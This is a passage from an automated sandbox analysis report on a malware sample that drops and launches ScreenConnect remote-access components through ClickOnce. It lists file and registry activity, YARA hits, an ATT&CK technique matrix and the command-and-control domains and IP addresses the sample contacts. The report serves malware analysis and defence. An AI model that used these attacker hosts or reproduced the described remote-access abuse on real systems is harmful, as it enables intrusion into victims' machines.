                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\44WRGOCZ.N86\B07C6WH9.KE3\ScreenConnect.Windows.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\44WRGOCZ.N86\B07C6WH9.KE3\ScreenConnect.ClientService.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\44WRGOCZ.N86\B07C6WH9.KE3\ScreenConnect.Core.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\44WRGOCZ.N86\B07C6WH9.KE3\ScreenConnect.WindowsClient.exe VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\44WRGOCZ.N86\B07C6WH9.KE3\ScreenConnect.Client.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\44WRGOCZ.N86\B07C6WH9.KE3\ScreenConnect.ClientService.exe VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\44WRGOCZ.N86\B07C6WH9.KE3\ScreenConnect.WindowsBackstageShell.exe VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\44WRGOCZ.N86\B07C6WH9.KE3\ScreenConnect.WindowsFileManager.exe.config VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\44WRGOCZ.N86\B07C6WH9.KE3\ScreenConnect.WindowsClient.exe.config VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\44WRGOCZ.N86\B07C6WH9.KE3\ScreenConnect.WindowsBackstageShell.exe.config VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\44WRGOCZ.N86\B07C6WH9.KE3\ScreenConnect.WindowsFileManager.exe VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.WindowsClient.exe Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.WindowsClient.exe VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.WindowsClient.exe Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.Client.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.WindowsClient.exe Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.Core.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.WindowsClient.exe Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.Windows.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.WindowsClient.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.WindowsClient.exe Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.ClientService.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.WindowsClient.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.ClientService.exe Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.ClientService.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.ClientService.exe Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.Core.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.ClientService.exe Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.Windows.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.ClientService.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.14514.3.exe Code function: 0_2_00761807 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00761807
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.14514.3.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                  Source: Amcache.hve.8.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                  Source: Amcache.hve.8.dr Binary or memory string: msmpeng.exe
                  Source: Amcache.hve.8.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
                  Source: Amcache.hve.8.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
                  Source: Amcache.hve.8.dr Binary or memory string: MsMpEng.exe
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.14514.3.exe Registry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C Blob
                  Source: Yara match File source: 4.0.ScreenConnect.WindowsClient.exe.350000.0.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 00000004.00000000.1097848481.0000000000352000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                  Source: Yara match File source: 00000004.00000002.1496898405.000000000270A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 00000001.00000002.2709412544.000002728031A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: Process Memory Space: dfsvc.exe PID: 6956, type: MEMORYSTR
                  Source: Yara match File source: Process Memory Space: ScreenConnect.WindowsClient.exe PID: 6472, type: MEMORYSTR
                  Source: Yara match File source: Process Memory Space: ScreenConnect.ClientService.exe PID: 7040, type: MEMORYSTR
                  Source: Yara match File source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..ient_4b14c015c87c1ad8_0018.0004_none_b4e7e84fe683500e\ScreenConnect.WindowsClient.exe, type: DROPPED
                  | Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
                  |---|---|---|---|---|---|---|---|---|---|---|---|---|---|
                  | Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 11 Native API | 1 DLL Side-Loading | 1 DLL Side-Loading | 21 Disable or Modify Tools | OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 1 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
                  | Credentials | Domains | Default Accounts | 12 Command and Scripting Interpreter | 1 DLL Search Order Hijacking | 1 DLL Search Order Hijacking | 1 Obfuscated Files or Information | LSASS Memory | 2 File and Directory Discovery | Remote Desktop Protocol | Data from Removable Media | 21 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service |
                  | Email Addresses | DNS Server | Domain Accounts | 1 Scheduled Task/Job | 1 Windows Service | 1 Windows Service | 1 Install Root Certificate | Security Account Manager | 14 System Information Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 1 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact |
                  | Employee Names | Virtual Private Server | Local Accounts | Cron | 1 Scheduled Task/Job | 12 Process Injection | 1 Timestomp | NTDS | 41 Security Software Discovery | Distributed Component Object Model | Input Capture | 2 Non-Application Layer Protocol | Traffic Duplication | Data Destruction |
                  | Gather Victim Network Information | Server | Cloud Accounts | Launchd | 1 Bootkit | 1 Scheduled Task/Job | 1 DLL Side-Loading | LSA Secrets | 1 Process Discovery | SSH | Keylogging | 3 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact |
                  | Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Search Order Hijacking | Cached Domain Credentials | 41 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
                  | DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 Masquerading | DCSync | 1 Application Window Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
                  | Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 Modify Registry | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
                  | Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 41 Virtualization/Sandbox Evasion | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement |
                  | IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 12 Process Injection | Network Sniffing | Network Service Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement |
                  | Network Security Appliances | Domains | Compromise Software Dependencies and Development Tools | AppleScript | Launchd | Launchd | 1 Hidden Users | Input Capture | System Network Connections Discovery | Software Deployment Tools | Remote Data Staging | Mail Protocols | Exfiltration Over Unencrypted Non-C2 Protocol | Firmware Corruption |
                  | Gather Victim Org Information | DNS Server | Compromise Software Supply Chain | Windows Command Shell | Scheduled Task | Scheduled Task | 1 Bootkit | Keylogging | Process Discovery | Taint Shared Content | Screen Capture | DNS | Exfiltration Over Physical Medium | Resource Hijacking |
                  Behavior Graph ID: 1638406, Sample: SecuriteInfo.com.W32.Lolbas..., Startdate: 14/03/2025, Architecture: WINDOWS, Score: 51
                  DNS/IP: variols.ephelp.site; p.djhelp.top; bg.microsoft.map.fastly.net
                  Signatures: Multi AV Scanner detection for submitted file; .NET source code references suspicious native API functions; Detected potential unwanted application; Contains functionality to hide user accounts
                  Process: SecuriteInfo.com.W32.Lolbas.A.tr.14514.3.exe (started)
                    Process: dfsvc.exe (started)
                      DNS/IP: p.djhelp.top 172.67.152.68, 443, 49683, 49684 CLOUDFLARENETUS United States
                      Dropped: C:\...\ScreenConnect.WindowsFileManager.exe, PE32
                      Dropped: C:\Users\...\ScreenConnect.WindowsClient.exe, PE32
                      Dropped: ScreenConnect.WindowsBackstageShell.exe, PE32
                      Dropped: 13 other files (none is malicious)
                      Process: ScreenConnect.WindowsClient.exe (started)
                        DNS/IP: variols.ephelp.site 95.214.234.11, 49710, 8880 HondurasInternetSAHN Ukraine
                        Signature: Contains functionality to hide user accounts
                        Process: ScreenConnect.ClientService.exe (started)
                          Signatures: Contains functionality to hide user accounts; Reads the Security eventlog; Reads the System eventlog
                          Process: WerFault.exe (started)
                    Process: WerFault.exe (started)

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.